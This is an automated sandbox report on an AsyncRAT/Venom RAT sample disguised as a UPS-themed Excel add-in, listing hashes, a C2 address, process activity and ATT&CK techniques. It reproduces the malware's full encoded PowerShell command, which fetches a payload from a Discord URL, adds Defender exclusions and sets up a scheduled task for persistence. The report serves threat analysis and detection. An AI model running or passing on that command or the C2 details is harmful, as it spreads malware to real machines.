asyncrat | d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

General

Target

UPS Access infos.xll
Size

2.0MB
MD5

df7e8add740fcae0d645eb8f66e085f4
SHA1

f5fd645f5596028a550c1e3351f3e097b33ddc17
SHA256

d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403
SHA512

65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://cdn.discordapp.com/attachments/982077202424279072/992061153092063242/Librarieszip

Extracted

Language

xlm4.0

Source

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

expresschiatto.freeddns.org:4449

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1740-165-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

47 4304 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

nice.exeSpreadsheetManager.exe

pid process

2388 nice.exe
1532 SpreadsheetManager.exe
Loads dropped DLL 2 IoCs

Processes:

EXCEL.EXE

pid process

4880 EXCEL.EXE
4880 EXCEL.EXE
Suspicious use of SetThreadContext 1 IoCs

Processes:

SpreadsheetManager.exe

description pid process target process

PID 1532 set thread context of 1740 1532 SpreadsheetManager.exe InstallUtil.exe

flow	pid	process
47	4304	powershell.exe

pid	process
2388	nice.exe
1532	SpreadsheetManager.exe

pid	process
4880	EXCEL.EXE
4880	EXCEL.EXE

description	pid	process	target process
PID 1532 set thread context of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2540 schtasks.exe

pid	process
2540	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2536 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4880 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeSpreadsheetManager.exe

pid process

4304 powershell.exe
4304 powershell.exe
1532 SpreadsheetManager.exe
1532 SpreadsheetManager.exe

pid	process
2536	PING.EXE

pid	process
4880	EXCEL.EXE

pid	process
4304	powershell.exe
4304	powershell.exe
1532	SpreadsheetManager.exe
1532	SpreadsheetManager.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

EXCEL.EXEpowershell.exeSpreadsheetManager.exeInstallUtil.exe

description	pid	process
Token: SeDebugPrivilege	4880	EXCEL.EXE
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	1532	SpreadsheetManager.exe
Token: SeDebugPrivilege	1740	InstallUtil.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

EXCEL.EXE

pid process

4880 EXCEL.EXE
4880 EXCEL.EXE
4880 EXCEL.EXE
4880 EXCEL.EXE
4880 EXCEL.EXE
4880 EXCEL.EXE
4880 EXCEL.EXE
4880 EXCEL.EXE
4880 EXCEL.EXE
4880 EXCEL.EXE

pid	process
4880	EXCEL.EXE
4880	EXCEL.EXE
4880	EXCEL.EXE
4880	EXCEL.EXE
4880	EXCEL.EXE
4880	EXCEL.EXE
4880	EXCEL.EXE
4880	EXCEL.EXE
4880	EXCEL.EXE
4880	EXCEL.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

EXCEL.EXEnice.execmd.execmd.exepowershell.exeSpreadsheetManager.exe

description	pid	process	target process
PID 4880 wrote to memory of 2388	4880	EXCEL.EXE	nice.exe
PID 4880 wrote to memory of 2388	4880	EXCEL.EXE	nice.exe
PID 2388 wrote to memory of 3824	2388	nice.exe	cmd.exe
PID 2388 wrote to memory of 3824	2388	nice.exe	cmd.exe
PID 3824 wrote to memory of 2064	3824	cmd.exe	cmd.exe
PID 3824 wrote to memory of 2064	3824	cmd.exe	cmd.exe
PID 2064 wrote to memory of 2536	2064	cmd.exe	PING.EXE
PID 2064 wrote to memory of 2536	2064	cmd.exe	PING.EXE
PID 3824 wrote to memory of 4304	3824	cmd.exe	powershell.exe
PID 3824 wrote to memory of 4304	3824	cmd.exe	powershell.exe
PID 4304 wrote to memory of 1532	4304	powershell.exe	SpreadsheetManager.exe
PID 4304 wrote to memory of 1532	4304	powershell.exe	SpreadsheetManager.exe
PID 4304 wrote to memory of 1532	4304	powershell.exe	SpreadsheetManager.exe
PID 4304 wrote to memory of 2540	4304	powershell.exe	schtasks.exe
PID 4304 wrote to memory of 2540	4304	powershell.exe	schtasks.exe
PID 1532 wrote to memory of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe
PID 1532 wrote to memory of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe
PID 1532 wrote to memory of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe
PID 1532 wrote to memory of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe
PID 1532 wrote to memory of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe
PID 1532 wrote to memory of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe
PID 1532 wrote to memory of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe
PID 1532 wrote to memory of 1740	1532	SpreadsheetManager.exe	InstallUtil.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\UPS Access infos.xll"
1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4880

C:\Users\Admin\AppData\Roaming\nice.exe
"C:\Users\Admin\AppData\Roaming\nice.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cmd.exe /C ping 1.1.1.1 -n 4 > Nul & powershell -WindowStyle Hidden -Encoded JABhADEAIAA9ACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABpAG4AcwB0AGEAbABsAC4AdABlAG0AcAAuAGwAbwBnACcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADkAOAAyADAANwA3ADIAMAAyADQAMgA0ADIANwA5ADAANwAyAC8AOQA5ADIAMAA2ADAANAAwADgAOQA4ADgAOQA3ADEAMAA3ADgALwBjAC4ANgA0ACcAIAAtAE8AdQB0AGYAaQBsAGUAIAAkAGEAMQA7ACQAdwBvAHIAbABkACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAYQAxADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdwBvAHIAbABkACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBSAHUAbgAoACkAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAZQB4AGUAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACIALAAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAUwBwAHIAZQBhAGQAcwBoAGUAZQB0AE0AYQBuAGEAZwBlAHIALgBlAHgAZQAiADsAJABmACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAGIAcwAuAHoAaQBwACcAOwBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgAgAC0AUABhAHQAaABUAHkAIABMAGUAYQBmACkAKQB7ACAAdAByAHkAIAB7ACQAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBhAEgAUgAwAGMASABNADYATAB5ADkAagBaAEcANAB1AFoARwBsAHoAWQAyADkAeQBaAEcARgB3AGMAQwA1AGoAYgAyADAAdgBZAFgAUgAwAFkAVwBOAG8AYgBXAFYAdQBkAEgATQB2AE8AVABnAHkATQBEAGMAMwBNAGoAQQB5AE4ARABJADAATQBqAGMANQBNAEQAYwB5AEwAegBrADUATQBqAEEAMgBNAFQARQAxAE0AegBBADUATQBqAEEAMgBNAHoASQAwAE0AaQA5AE0AYQBXAEoAeQBZAFgASgBwAFoAWABOADYAYQBYAEEAPQAnACkAKQA7ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABzACAALQBPAHUAdABmAGkAbABlACAAJABmADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABmACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACcAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGYAfQBjAGEAdABjAGgAewB9AH0AZQBsAHMAZQB7AH0AOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAFMAcAByAGUAYQBkAHMAaABlAGUAdABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACIAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAOwBzAGMAaAB0AGEAcwBrAHMAIAAvAGMAcgBlAGEAdABlACAALwBzAGMAIABPAE4ATABPAEcATwBOACAALwBGACAALwB0AG4AIAAiAFMAcAByAGUAYQBkAHMAaABlAGUAdAAgAE0AYQBuAGEAZwBlAHIAIABVAHQAaQBsAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAgAC8AcgBsACAASABJAEcASABFAFMAVAAgAC8AdAByACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABTAHAAcgBlAGEAZABzAGgAZQBlAHQATQBhAG4AYQBnAGUAcgAuAGUAeABlACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGEAMQA7AA==
3⤵
- Suspicious use of WriteProcessMemory
PID:3824

C:\Windows\system32\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 4
4⤵
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 4
5⤵
- Runs ping.exe
PID:2536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Encoded JABhADEAIAA9ACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABpAG4AcwB0AGEAbABsAC4AdABlAG0AcAAuAGwAbwBnACcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADkAOAAyADAANwA3ADIAMAAyADQAMgA0ADIANwA5ADAANwAyAC8AOQA5ADIAMAA2ADAANAAwADgAOQA4ADgAOQA3ADEAMAA3ADgALwBjAC4ANgA0ACcAIAAtAE8AdQB0AGYAaQBsAGUAIAAkAGEAMQA7ACQAdwBvAHIAbABkACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAYQAxADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdwBvAHIAbABkACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBSAHUAbgAoACkAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAZQB4AGUAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACIALAAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAUwBwAHIAZQBhAGQAcwBoAGUAZQB0AE0AYQBuAGEAZwBlAHIALgBlAHgAZQAiADsAJABmACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAGIAcwAuAHoAaQBwACcAOwBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgAgAC0AUABhAHQAaABUAHkAIABMAGUAYQBmACkAKQB7ACAAdAByAHkAIAB7ACQAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBhAEgAUgAwAGMASABNADYATAB5ADkAagBaAEcANAB1AFoARwBsAHoAWQAyADkAeQBaAEcARgB3AGMAQwA1AGoAYgAyADAAdgBZAFgAUgAwAFkAVwBOAG8AYgBXAFYAdQBkAEgATQB2AE8AVABnAHkATQBEAGMAMwBNAGoAQQB5AE4ARABJADAATQBqAGMANQBNAEQAYwB5AEwAegBrADUATQBqAEEAMgBNAFQARQAxAE0AegBBADUATQBqAEEAMgBNAHoASQAwAE0AaQA5AE0AYQBXAEoAeQBZAFgASgBwAFoAWABOADYAYQBYAEEAPQAnACkAKQA7ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABzACAALQBPAHUAdABmAGkAbABlACAAJABmADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABmACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACcAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGYAfQBjAGEAdABjAGgAewB9AH0AZQBsAHMAZQB7AH0AOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAFMAcAByAGUAYQBkAHMAaABlAGUAdABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACIAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAOwBzAGMAaAB0AGEAcwBrAHMAIAAvAGMAcgBlAGEAdABlACAALwBzAGMAIABPAE4ATABPAEcATwBOACAALwBGACAALwB0AG4AIAAiAFMAcAByAGUAYQBkAHMAaABlAGUAdAAgAE0AYQBuAGEAZwBlAHIAIABVAHQAaQBsAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAgAC8AcgBsACAASABJAEcASABFAFMAVAAgAC8AdAByACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABTAHAAcgBlAGEAZABzAGgAZQBlAHQATQBhAG4AYQBnAGUAcgAuAGUAeABlACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGEAMQA7AA==
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4304

C:\ProgramData\SpreadsheetManager.exe
"C:\ProgramData\SpreadsheetManager.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1740

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /F /tn "Spreadsheet Manager Utility Update" /rl HIGHEST /tr C:\ProgramData\SpreadsheetManager.exe
5⤵
- Creates scheduled task(s)
PID:2540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SpreadsheetManager.exe
Filesize
381KB

MD5
c1dc5704c9bf143276bedd4c3e2b601d

SHA1
0f637d066eeae31e664456c939c70e4437d36781

SHA256
539bd579b4269c190d5ff2ac4eb9ccf8a452291054ad5b60204267985a1a13c7

SHA512
602330edd872451d6a222b2492d060fc229c50cce5991cfd102e50f189a51e2c27d09150bc96954c6c07dd88e8a94b14316b15e8e38cf54d68996cb038302110

Download Submit
C:\ProgramData\SpreadsheetManager.exe
Filesize
381KB

MD5
c1dc5704c9bf143276bedd4c3e2b601d

SHA1
0f637d066eeae31e664456c939c70e4437d36781

SHA256
539bd579b4269c190d5ff2ac4eb9ccf8a452291054ad5b60204267985a1a13c7

SHA512
602330edd872451d6a222b2492d060fc229c50cce5991cfd102e50f189a51e2c27d09150bc96954c6c07dd88e8a94b14316b15e8e38cf54d68996cb038302110

Download Submit
C:\Users\Admin\AppData\Local\Temp\UPS Access infos.xll
Filesize
2.0MB

MD5
df7e8add740fcae0d645eb8f66e085f4

SHA1
f5fd645f5596028a550c1e3351f3e097b33ddc17

SHA256
d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

SHA512
65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\UPS Access infos.xll
Filesize
2.0MB

MD5
df7e8add740fcae0d645eb8f66e085f4

SHA1
f5fd645f5596028a550c1e3351f3e097b33ddc17

SHA256
d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

SHA512
65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

Download Submit
C:\Users\Admin\AppData\Roaming\nice.exe
Filesize
427KB

MD5
9b38ad9554c2364a3e81c66edfdaaa04

SHA1
c33ea06c3cd25c6c80ff923d81853d0e31bd002f

SHA256
e07afa746786483bb2e783640980daa167b9de1505c894e5633bf05994abd7af

SHA512
6cbbe75afdb9f9e50c4fce26ef33958a5e6652eeb096645663739c3c634ceb5fadb3e01d33bc9111af577cfcb0d34467f485e55bfa67fa40a0d8e4c9bc1f3b74

Download Submit
C:\Users\Admin\AppData\Roaming\nice.exe
Filesize
427KB

MD5
9b38ad9554c2364a3e81c66edfdaaa04

SHA1
c33ea06c3cd25c6c80ff923d81853d0e31bd002f

SHA256
e07afa746786483bb2e783640980daa167b9de1505c894e5633bf05994abd7af

SHA512
6cbbe75afdb9f9e50c4fce26ef33958a5e6652eeb096645663739c3c634ceb5fadb3e01d33bc9111af577cfcb0d34467f485e55bfa67fa40a0d8e4c9bc1f3b74

Download Submit
memory/1532-159-0x0000000000B50000-0x0000000000BB6000-memory.dmp

Filesize
408KB

Download
memory/1532-163-0x0000000008AB0000-0x0000000008ABA000-memory.dmp

Filesize
40KB

Download
memory/1532-160-0x0000000005040000-0x00000000055E4000-memory.dmp

Filesize
5.6MB

Download
memory/1532-154-0x0000000000000000-mapping.dmp

Download
memory/1532-161-0x0000000004B30000-0x0000000004BC2000-memory.dmp

Filesize
584KB

Download
memory/1532-162-0x0000000004BD0000-0x0000000004C6C000-memory.dmp

Filesize
624KB

Download
memory/1740-165-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1740-166-0x0000000005C00000-0x0000000005C66000-memory.dmp

Filesize
408KB

Download
memory/1740-164-0x0000000000000000-mapping.dmp

Download
memory/2064-146-0x0000000000000000-mapping.dmp

Download
memory/2388-142-0x0000000000000000-mapping.dmp

Download
memory/2536-147-0x0000000000000000-mapping.dmp

Download
memory/2540-156-0x0000000000000000-mapping.dmp

Download
memory/3824-145-0x0000000000000000-mapping.dmp

Download
memory/4304-152-0x0000028D54BA0000-0x0000028D54BB2000-memory.dmp

Filesize
72KB

Download
memory/4304-157-0x00007FFB514D0000-0x00007FFB51F91000-memory.dmp

Filesize
10.8MB

Download
memory/4304-149-0x0000000000000000-mapping.dmp

Download
memory/4304-150-0x0000028D3C560000-0x0000028D3C582000-memory.dmp

Filesize
136KB

Download
memory/4304-153-0x0000028D54B90000-0x0000028D54B9A000-memory.dmp

Filesize
40KB

Download
memory/4304-151-0x00007FFB514D0000-0x00007FFB51F91000-memory.dmp

Filesize
10.8MB

Download
memory/4880-138-0x00000230D2AB0000-0x00000230D2CD2000-memory.dmp

Filesize
2.1MB

Download
memory/4880-131-0x00007FFB3A190000-0x00007FFB3A1A0000-memory.dmp

Filesize
64KB

Download
memory/4880-134-0x00007FFB3A190000-0x00007FFB3A1A0000-memory.dmp

Filesize
64KB

Download
memory/4880-132-0x00007FFB3A190000-0x00007FFB3A1A0000-memory.dmp

Filesize
64KB

Download
memory/4880-133-0x00007FFB3A190000-0x00007FFB3A1A0000-memory.dmp

Filesize
64KB

Download
memory/4880-136-0x00007FFB38130000-0x00007FFB38140000-memory.dmp

Filesize
64KB

Download
memory/4880-148-0x00007FFB514D0000-0x00007FFB51F91000-memory.dmp

Filesize
10.8MB

Download
memory/4880-135-0x00007FFB38130000-0x00007FFB38140000-memory.dmp

Filesize
64KB

Download
memory/4880-130-0x00007FFB3A190000-0x00007FFB3A1A0000-memory.dmp

Filesize
64KB

Download
memory/4880-141-0x00007FFB514D0000-0x00007FFB51F91000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads